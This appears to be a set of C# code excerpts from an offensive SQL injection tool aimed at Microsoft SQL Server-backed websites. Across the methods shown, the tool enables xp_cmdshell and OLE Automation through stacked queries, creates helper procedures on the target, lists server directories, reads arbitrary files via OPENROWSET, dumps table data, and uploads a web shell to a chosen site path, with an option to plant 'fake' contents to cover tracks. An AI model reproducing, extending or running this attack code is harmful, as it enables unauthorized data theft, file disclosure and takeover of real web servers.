예제 #1
0
        public static void initialize(string url)
        {
            Log.logNotification("Confirming Web Response..");

            var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

            if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
            {
                Log.logNotification("Web Response is OK..");

                if (createFuncDir(url))
                {
                    string UserChoice = "z";
                    while (UserChoice != "x")
                    {
                        UserChoice = UserInteraction.takeInputString("Press 'x' for Exit..\nEnter Directory to get listing.. eg C:\\, C:\\users\\.. ");

                        if (UserChoice != "x")
                        {
                            navigate(url, UserChoice);
                        }
                    }

                    dropObject(url, QueriesDB.DropFuncQuery);
                }
            }
            else
            {
                Log.logError("No response from the server..");
            }
        }
예제 #2
0
        public static string ReadFileDirect(string url, string fileName)
        {
            string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);

            string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", fileName);

            var response = HTTPMethods.getResponse(FinalFileReadURL);

            if (response != null)
            {
                response = ResponseFilter.getPureResponseWithLastIndex(response);
                if (response != null)
                {
                    response = response.Replace(" ", "");
                    return(response);
                }
                else
                {
                    return(null);
                }
            }
            else
            {
                return(null);
            }
        }
예제 #3
0
        public static string[] getObjects(string url, string stackedQuery, string replacement)
        {
            string URLFortableDumpToTempTable = QueryCrafter.construcQueryForTableDump(url, stackedQuery, replacement);

            if (ResponseFilter.confirmResponce(URLFortableDumpToTempTable, replacement))
            {
                string URLForTableOutput = QueryCrafter.constructURLForOutputFromTempTable(url);

                var response = HTTPMethods.getResponse(URLForTableOutput);

                if (response != null)
                {
                    response = ResponseFilter.getPureResponse(response);

                    return(ResponseFilter.parseResponce(response));
                }
                else
                {
                    return(null);
                }
            }
            else
            {
                return(null);
            }
        }
예제 #4
0
        public static void getColumns(string url, string tableName)
        {
            string UserColumnQuery = QueryCrafter.constructQueryForColumns(QueriesDB.ColumnStackedQuery, tableName);

            string[] Columns = getObjects(url, UserColumnQuery, QueriesDB.Replacement);

            if (Columns != null)
            {
                dropTempTable(url, QueriesDB.DropTableStackedQuery, QueriesDB.Replacement);
                Log.showObjects(Columns, "COLUMN");
                dumpData(url, tableName, Columns);
            }
            Columns = null;
        }
예제 #5
0
        public static bool dropTempTable(string url, string dropTableStackedQuery, string replacement)
        {
            url = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
            url = QueryCrafter.constructURLForDroppingObject(url, dropTableStackedQuery);

            if (HTTPMethods.getResponse(url).Contains(replacement))
            {
                return(true);
            }
            else
            {
                return(false);
            }
        }
예제 #6
0
        public static bool enableXPCMDShell(string url)
        {
            string XPCMDShellEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableXPCMDShell);

            XPCMDShellEnablingQuery = XPCMDShellEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement);

            if (ResponseFilter.confirmResponce(XPCMDShellEnablingQuery, QueriesDB.Replacement))
            {
                Log.logOutput("XP CMD Shell Enabled..");
                return(true);
            }
            Log.logError("Failed to Enable XP CMD Shell..");
            return(false);
        }
예제 #7
0
        public static bool enableOLEAutomation(string url)
        {
            string OLEAutomationEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableOLEAutomation);

            OLEAutomationEnablingQuery = OLEAutomationEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement);

            if (ResponseFilter.confirmResponce(OLEAutomationEnablingQuery, QueriesDB.Replacement))
            {
                Log.logOutput("OLE Automation Enabled..");
                return(true);
            }
            Log.logError("Failed to Enable OLE Automation Procedures..");
            return(false);
        }
예제 #8
0
        public static void initialize(string url)
        {
            Log.logNotification("Confirming Web Response..");

            var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

            if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
            {
                Log.logNotification("Web Response is OK..");
                getTables(url);
            }
            else
            {
                Log.logError("No response from the server..");
            }
        }
예제 #9
0
        static void navigate(string url, string dir)
        {
            var URLForNavigating = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadDirWithFuncQuery);

            URLForNavigating = URLForNavigating.Replace("[DIR]", dir);

            var response = HTTPMethods.getResponse(URLForNavigating);

            response = ResponseFilter.getPureResponseWithLastIndex(response);

            response = XML.addRoot(response);

            FileIO.createWriteFile(response, "tmp.txt");

            List <string> DirectoryFiles = XML.parseXML("tmp.txt", "dir");

            Log.showObjects(DirectoryFiles, "DIR Listing");
        }
예제 #10
0
        static bool createProcFcUk(string url)
        {
            try
            {
                var FcUkProcCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery);
                FcUkProcCreationURL = QueryCrafter.constructURLForConfirmation(FcUkProcCreationURL, QueriesDB.Replacement);

                if (ResponseFilter.confirmResponce(FcUkProcCreationURL, QueriesDB.Replacement))
                {
                    var FcUkProcConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery);
                    var response = HTTPMethods.getResponse(FcUkProcConfirmationURL);

                    if (response != null)
                    {
                        if (ResponseFilter.getPureResponseWithLastIndex(response) == "FcUk")
                        {
                            Log.logOutput("Procedure to Upload Shell is created..");
                            return(true);
                        }
                        else
                        {
                            Log.logError("1 Procedure to Upload Shell cannot be created..");
                            return(false);
                        }
                    }
                    else
                    {
                        Log.logError("2 Procedure to Upload Shell cannot be created..");
                        return(false);
                    }
                }
                else
                {
                    Log.logError("Erroneous response from the server..");
                    Log.logError("Procedure to Upload Shell cannot be created..");
                    return(false);
                }
            }
            catch (Exception ex)
            {
                Log.logError(ex.Message);
                return(false);
            }
        }
예제 #11
0
        static bool createFuncDir(string url)
        {
            try
            {
                var DIRFuncCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery);
                DIRFuncCreationURL = QueryCrafter.constructURLForConfirmation(DIRFuncCreationURL, QueriesDB.Replacement);
                if (ResponseFilter.confirmResponce(DIRFuncCreationURL, QueriesDB.Replacement))
                {
                    var DIRFuncConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery);
                    var response = HTTPMethods.getResponse(DIRFuncConfirmationURL);

                    if (response != null)
                    {
                        if (ResponseFilter.getPureResponseWithLastIndex(response) == "Dir")
                        {
                            Log.logOutput("Function to get Directory Listing is created..");
                            return(true);
                        }
                        else
                        {
                            Log.logError("Function to get Directory Listing cannot be created..");
                            return(false);
                        }
                    }
                    else
                    {
                        Log.logError("Function to get Directory Listing cannot be created..");
                        return(false);
                    }
                }
                else
                {
                    Log.logError("Erroneous response from the server..");
                    Log.logError("Function to get Directory Listing cannot be created..");
                    return(false);
                }
            }
            catch (Exception ex)
            {
                Log.logError(ex.Message);
                return(false);
            }
        }
예제 #12
0
 static bool dropObject(string url, string ObjectDroppingQuery)
 {
     try
     {
         var DirFuncDroppingQuery = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
         DirFuncDroppingQuery = QueryCrafter.constructURLForConfirmation(DirFuncDroppingQuery, QueriesDB.Replacement);
         if (ResponseFilter.confirmResponce(DirFuncDroppingQuery, QueriesDB.Replacement))
         {
             return(true);
         }
         else
         {
             return(false);
         }
     }
     catch (Exception ex)
     {
         Log.logError(ex.Message);
         return(false);
     }
 }
예제 #13
0
        public static void Read(string url)
        {
            string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);
            string UserChoice        = "z";

            while (UserChoice != "x")
            {
                UserChoice = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext ..");
                if (UserChoice != "x")
                {
                    string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", UserChoice);
                    var    response         = HTTPMethods.getResponse(FinalFileReadURL);
                    if (response != null)
                    {
                        response = ResponseFilter.getPureResponseWithLastIndex(response);
                        if (response != null)
                        {
                            Log.logOutput("--- [File Contents Start]  ---");
                            Log.logOutput(response);
                            Log.logOutput("--- [File Cotents End] ---");

                            UserChoice = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore..");

                            if (UserChoice == "s")
                            {
                                SaveFile(response);
                            }

                            UserChoice = "z";
                        }
                        else
                        {
                            Log.logError("Either File is empty or you 've no right to read that File..");
                        }
                    }
                }
            }
        }
예제 #14
0
        public static void Spawn(string url)
        {
            Log.logNotification("Confirming Web Response..");

            var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

            if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
            {
                Log.logNotification("Web Response is OK..");

                if (createProcFcUk(url))
                {
                    string RootPath = "z";
                    while (RootPath != "x")
                    {
                        RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
                        if (RootPath != "x")
                        {
                            string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");

                            string UrlForUploading = null;

                            string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");

                            if (x == "f")
                            {
                                UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
                            }
                            else
                            {
                                UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);
                            }


                            UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath);
                            UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName);
                            UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement);

                            Log.logNotification("Uploading shell to " + RootPath + fileName);

                            if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
                            {
                                Log.logNotification("Confirming File Upload..");
                                if (confirmFileUpload(url, RootPath + fileName))
                                {
                                    Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName);
                                }
                                else
                                {
                                    Log.logError("Fail to upload file..");
                                }
                            }
                        }
                    }
                }
                dropObject(url, QueriesDB.DropFcUkProcQuery);
            }
            else
            {
                Log.logError("No response from the server..");
            }
        }
예제 #15
0
        public static void dumpData(string url, string UserSelectedTable, string[] Columns)
        {
            var FileName = "";

            if (!String.IsNullOrEmpty((FileName = UserInteraction.takeInputForTableFileGeneration())))
            {
                var XAML = XML.addRoot(ResponseFilter.getPureResponse(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
                dumpXML(XAML, UserSelectedTable, FileName, Columns);

                Log.logNotification("If ur unable to see table Data, dont worry I've another method..");
                UserInteraction.promptForUserInput("Press 'n' to try another method OR Press any key to continue..");
                var UserInput = Console.ReadLine();

                if (UserInput.ToLower() == "n")
                {
                    XAML = XML.addRoot(ResponseFilter.getPureResponseWithLastIndex(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
                    dumpXML(XAML, UserSelectedTable, FileName, Columns);
                }

                Log.logNotification("Data dump complete.. and if no data is displayed to you.. table might be empty.. Press any key to continue..");
                Console.ReadKey();
            }

            FileIO.deleteTempFile("tmp.txt");
        }